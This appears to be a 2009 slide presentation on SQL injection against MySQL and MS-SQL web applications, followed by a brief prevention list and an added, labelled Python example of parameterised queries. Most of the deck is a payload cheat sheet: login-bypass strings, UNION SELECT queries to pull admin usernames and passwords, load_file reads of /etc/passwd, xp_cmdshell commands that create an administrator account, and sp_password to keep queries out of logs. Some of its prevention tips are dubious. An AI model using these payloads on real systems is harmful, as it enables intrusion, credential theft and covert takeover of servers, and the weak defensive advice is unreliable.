
by : nazRuL [at] delaforta.net


27 March 2009
Introduction
SQL INJECTION

SQL injection is a code injection technique that exploits a
security vulnerability occurring in the database layer of an
application. The vulnerability is present when user input is
either incorrectly filtered for string literal escape characters
embedded in SQL statements or user input is not strongly
typed and thereby unexpectedly executed.
Simple Concept
or 1=1--
or =
' or 1=1#
') or '1'='1--
' or 1=1/*
admin'/*
etc.
MySQL Injection
1. Unvalidated input
2. Appending a quote mark ()
3. Testing with an AND query
INJECTION...
FIND THE NUMBER OF TABLES
=> ORDER BY
FIND THE COLUMN POSITIONS
=> UNION SELECT
FIND TABLE NAMES
> information_schema
> limit
> group_concat

INJECTION (Continue...)
FIND COLUMN NAMES
> information_schema
> table_name = hex string
> limit
> group_concat

* Let's get the XxX..
THE SECRET BEHIND the information_schema table

* Magic Query
.:. load_file(/path/file);
ex : /etc/passwd
.:. into dumpfile (/path/file);
Ex : /tmp/blabla (permissions 777)
/a/known/path/
Advanced...
MS-SQL Injection
1. Unvalidated input
2. Appending a quote mark ()
3. Testing with an AND query
INJECTION...
Finding table names
=> having 1=1--
(exploiting the SQL query error message)
Exploiting a group by query
=> (group by table,table having 1=1--)

INJECTION...
DATA MANIPULATION
* UPDATE
(update table_name set column2 where column1=n)
* INSERT
(insert into table_name values(n,value))
* DROP (drop table table_name)
* SHUTDOWN

* Magic Query
.:. Check the current user
convert(int,(select+user));--
.:. CMD shell query
* exec+master..xp_cmdshell net user uname pass /add
* exec+master..xp_cmdshell net localgroup administrators uname /add

Advanced...
Prevention
- PHP based
1. Convert all to Int
2. Magic quotes Off
3. strip_tags function
4. addslashes function
- ASP based
1. Replace to
2. SQL Error Handling
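The prevention list above, shown as an added example that is not part of the original slides: a login query built by string concatenation beside the same query as a parameterised statement, plus the "convert all to int" check for numeric parameters. It assumes Python's built-in sqlite3 module and a constructed in-memory users table; the `' or 1=1--` input is the one from the Simple Concept slide.

```python
# Added example: vulnerable vs. parameterised login query (constructed data).
import sqlite3


def setup_db():
    # Constructed sample table; the credentials are placeholders.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")
    return conn


def login_vulnerable(conn, username, password):
    # String concatenation: a quote mark in the input closes the string
    # literal, and the rest of the input is parsed as SQL.
    sql = ("SELECT id FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    # Parameterised query: the values travel separately from the statement,
    # so a quote mark in the input is only data and never alters the query.
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def get_user_by_id(conn, raw_id):
    # "Convert all to Int": a numeric parameter is rejected unless it is a
    # plain integer, so it never carries SQL fragments into the query.
    try:
        uid = int(raw_id)
    except (TypeError, ValueError):
        return None
    return conn.execute("SELECT username FROM users WHERE id=?", (uid,)).fetchone()
```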

Blind-SQL Injection
Definition....
Blind-SQL

# Finding the admin table, username or password #

UNION+SELECT+1,2,table_name,4+FROM+INFORMATION_SCHEMA.TABLES
=> WHERE+table_name+NOT+IN+(table_yg_muncul)

UNION+SELECT+1,2,column_name,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=table_yg_diinginkan
=> WHERE+table_name='user'+AND+column_name+NOT+IN+(column_yg_muncul)

UNION+SELECT+1,2,user,pass,4+FROM+table_admin

# Tips

# Using concatenation
to display a field built from several column names

ID+:+username+:+userpass

( ID%2B':'%2Busername%2B':'%2Buserpass )

# Using --sp_password
sp_password causes MSSQL not to log the query
(it is possibly only logged on the server)
> often found in web applications: asp, cfm, aspx, etc.
